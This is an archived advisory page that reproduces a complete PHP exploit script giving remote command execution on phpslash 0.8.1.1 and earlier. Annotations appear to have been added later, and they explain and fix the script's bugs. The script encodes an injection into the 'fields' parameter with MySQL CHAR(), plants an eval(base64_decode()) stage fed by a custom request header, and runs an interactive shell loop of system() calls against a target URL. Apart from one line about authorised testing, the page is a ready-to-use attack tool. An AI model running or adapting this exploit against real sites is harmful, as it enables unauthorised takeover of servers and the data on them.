phpslash <= 0.8.1.1 Remote Code Execution Exploit

2009-02-05T00:00:00
ID SECURITYVULNS:DOC:21293
Type securityvulns
Reporter Securityvulns
Modified 2009-02-05T00:00:00

Description

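#!/usr/bin/php -q
<?php
/*
 * This file requires the PhpSploit class.
 * If you want to use this class, the latest
 * version can be downloaded from acid-root.new.fr.
 *
 * phpslash <= 0.8.1.1 Remote Code Execution Exploit
 * - - - - - - - - - - - - - - - - - - - - - - - - -
 * RCE with no special rights (guest).
 * No special PHP conditions required.
 * - - - - - - - - - - - - - - - - - - - - - - - - -
 * #0 It was a private sploit, but I decided to publish it
 * #1 You messed up on that one bro, it will not happen again =).
 * #2 Don't try to use it on hzv, I helped them to patch
 *    this one before I publish it =)
 * - - - - - - - - - - - - - - - - - - - - - - - - -
 * Exploitation steps:
 * 1 - include/class/tz_functions.inc tz_strftime()
 * 2 - include/class/tz_functions.inc tz_generic()
 * 3 - include/tz_env.class generic()
 *
 * How the payload is delivered (see main()):
 * - the PHP stage is sent in the `fields` query parameter of index.php,
 *   encoded as a MySQL CHAR(...) expression so the URL carries no quotes;
 * - it starts with "1');" (the original's "single quote bypass", presumably
 *   closing the quoted string the injected value lands in), prints a random
 *   marker, eval()s the base64 value of the MypCode request header, prints
 *   the marker again and exit()s. Each shell command is one HTTP request;
 *   the exploit itself stores nothing on the target.
 *
 * NOTE(review): eval(base64_decode($_SERVER[...])) driven by a custom
 * request header is a well-known webshell pattern and is routinely matched
 * by WAF/IDS rules. Use only against systems you are authorised to test.
 */

// Hide E_NOTICE only; warnings and errors stay visible.
error_reporting( E_ALL ^ E_NOTICE );
require('phpsploitclass.php');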

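// Main function: parse CLI options, build the injected PHP stage once, then
// run an interactive shell loop where every command is one HTTP request.
function main()
{
    // HTTP client from phpsploitclass.php (external dependency).
    $web = new phpsploit();
    $web->agent( 'Mozilla Firefox' );

    // Banner
    head();

    // Target base URL (mandatory: get_p() prints usage and exits if missing).
    // Normalised to end with '/' so "-url http://victim.com" no longer
    // produces "http://victim.comindex.php".
    $url = rtrim( get_p( 'url', true ), '/' ) . '/';

    // Optional proxy (host:port) and proxy credentials (usr:pwd).
    $prh = get_p( 'proxhost' );
    $pra = get_p( 'proxauth' );
    if( $prh )
    {
        $web->proxy( $prh );

        if( $pra )
            $web->proxyauth( $pra );
    }

    // Stage 1, sent in the URL: close the quoted string the injected value
    // lands in ("single quote bypass"), print a marker, eval the stage-2 code
    // carried base64-encoded in the MypCode request header, print the marker
    // again and exit so the rest of the page is not rendered.
    // HTTP_MYPCODE is deliberately an unquoted constant: no quotes in the stage.
    $byp = "1');";
    $php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';

    // Random marker used to cut the command output out of the HTML response.
    // It only has to be unique per run, not unpredictable, so rand() suffices.
    $s_sep = md5( rand( 0, 1000000000 ) . 'HEY_YA' );
    $c_sep = "print('$s_sep');";

    $final = $byp . $c_sep . $php . $c_sep . 'exit();//';

    // Interactive loop: cmd_prompt() returns false on exit/quit.
    while( ($cmd = cmd_prompt()) !== false )
    {
        // Stage 2: the shell command wrapped in system("..."); base64 keeps
        // it out of reach of magic_quotes_gpc on the target.
        $web->addheader( 'MypCode', base64_encode( 'system("' . add_slashes($cmd) . '");' ) );

        // Stage 1 goes through MySQL CHAR() encoding (see to_char()).
        $web->get( $url . 'index.php?fields=' . to_char( $final ) . ',1' );

        // Command output sits between the two markers.
        $res = explode( $s_sep, $web->getcontent() );

        if( !isset( $res[1] ) )
        {
            // No marker at all: the injection did not fire (patched target,
            // wrong URL, filtering...). Stop rather than keep hammering.
            print "\nFailed";
            exit(1);
        }

        // Strict comparison: the original empty() also swallowed an output
        // that was exactly "0".
        if( $res[1] === '' )
            print "\nNo output: system() disabled OR cmd failed OR cmd without output";
        else
            print "\n" . $res[1];
    }

    return;
}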

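// Escape a shell command so it can be embedded verbatim inside a PHP
// double-quoted string literal (main() builds 'system("' . $cmd . '");').
// Only backslash, double quote and dollar are special in that context.
// The original used addslashes(), which also escaped single quotes; PHP
// does not recognise \' inside "..." so the backslash survived and reached
// the remote shell (e.g. ls 'a b' became ls \'a b\' and was split in two).
function add_slashes( $str )
{
    return addcslashes( $str, '\\"$' );
}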

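// Command prompt: read one line from STDIN and return the trimmed command,
// or false when the operator types exit/quit.
// Also returns false on EOF (Ctrl-D, closed pipe): the original trimmed the
// false from fgets() into '' and looped forever, sending an empty command
// to the target on every iteration.
function cmd_prompt()
{
    print "\nshell>";

    $line = fgets( STDIN );
    if( $line === false )
        return false;

    $cmd = trim( $line );

    if( in_array( strtolower( $cmd ), array( 'exit', 'quit' ), true ) )
        return false;

    return $cmd;
}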

// MySQL CHAR() encoding: turn a byte string into "CHAR(n1,n2,...)" so the
// payload can travel in a URL without quote characters. An empty input
// yields "CHAR()".
function to_char( $data )
{
    $codes  = array();
    $length = strlen( $data );

    for( $pos = 0; $pos < $length; $pos++ )
        $codes[] = ord( $data[$pos] );

    return 'CHAR(' . implode( ',', $codes ) . ')';
}

// CLI params: look up "-<p>" in $_SERVER['argv'].
// Returns the following token when there is a non-empty one, true when the
// flag is present without a value, false when absent. With $exit set, a
// missing flag or value prints the usage and terminates instead.
// Note: empty() treats the value "0" as missing.
function get_p( $p, $exit = false )
{
    $argv = $_SERVER['argv'];
    $flag = '-' . $p;

    foreach( $argv as $idx => $token )
    {
        if( $token !== $flag )
            continue;

        $next = isset( $argv[$idx + 1] ) ? $argv[$idx + 1] : null;
        if( !empty( $next ) )
            return $next;

        if( $exit )
            usage();

        return true;
    }

    if( $exit )
        usage();

    return false;
}

// Banner printed once at start-up: tool name and author contact.
function head()
{
    $banner = array(
        "",
        "phpslash <= 0.8.1.1 Remote Code Execution Exploit",
        "-------------------------------------------------",
        "",
        " About: ",
        " by DarkFig < gmdarkfig (at) gmail (dot) com >",
        " http://acid-root.new.fr/",
        " #acidroot@irc.worldnet.net",
        "",
    );

    print implode( "\n", $banner ) . "\n";

    return;
}

// Usage text, then terminate with status 0. Called by get_p() when the
// mandatory -url option or its value is missing.
function usage()
{
    $text  = " Usage:\n";
    $text .= " php spl.php -url <website> [options]\n\n";
    $text .= " Example:\n";
    $text .= " php spl.php -url http://victim.com/\n\n";
    $text .= " Options:\n";
    $text .= " -proxhost <ip:port> if you wanna use a proxy\n";
    $text .= " -proxauth <usr:pwd> proxy with authentication\n";

    print $text;

    exit(0);
}

// Run baby -- script entry point; main() loops until exit/quit or a failed request.
main();

?>